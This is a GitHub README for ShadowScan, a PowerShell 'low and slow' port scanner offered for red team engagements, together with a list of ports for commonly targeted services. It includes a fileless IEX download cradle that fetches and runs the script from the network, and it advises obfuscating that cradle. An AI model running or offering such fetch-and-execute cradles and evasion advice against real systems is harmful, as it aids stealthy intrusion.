Skip to content

Latest commit

 

History

History
43 lines (38 loc) · 1.58 KB

README.md

File metadata and controls

43 lines (38 loc) · 1.58 KB

ShadowScan

ShadowScan captures the essence of stealthiness, slow scanning, and the pursuit of vulnerabilities like low-hanging fruit.

Based on the "Potential Hacks To Look For" - from https://github.com/trustedsec/spoonmap

This scanner is low and slow. Helpful for Red Team Engagements. The script will randomly sleep between ping scans and port scans.

How-To

Simply provide your ip file, a list of IPs and add any ports you'd like to scan.

PS> .\ShadowScan.ps1 -ipFile "ips.txt" -customPorts 80,443,445
  • By default, if no arguments are passed it will use ips.txt in the local folder and the default ports inside the script.

The script can be downloaded and run in memory. It will run the default options so make sure to have an ips.txt in the folder you're running the script from. Obviously obfuscation of the download cradle should be performed:

IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/srand2/ShadowScan/main/ShadowScan.ps1")

For Help

 .\ShadowScan.ps1 -help   

Service to Port Mappings

Feel free to add mappings to other services and their respective ports:

$portServices = @{
    80    = "HTTP";
    443   = "HTTPS";
    445   = "SMB";
    7070  = "WebLogic";
    7071  = "WebLogic";
    4786  = "Cisco Smart Install";
    4848  = "GlassFish";
    5555  = "HP Data Protector";
    5556  = "HP Data Protector";
    3300  = "SAP";
    6129  = "DameWare";
    6379  = "Redis";
    6970  = "Cisco Unified Comm Manager";
    Port  = "Service"
}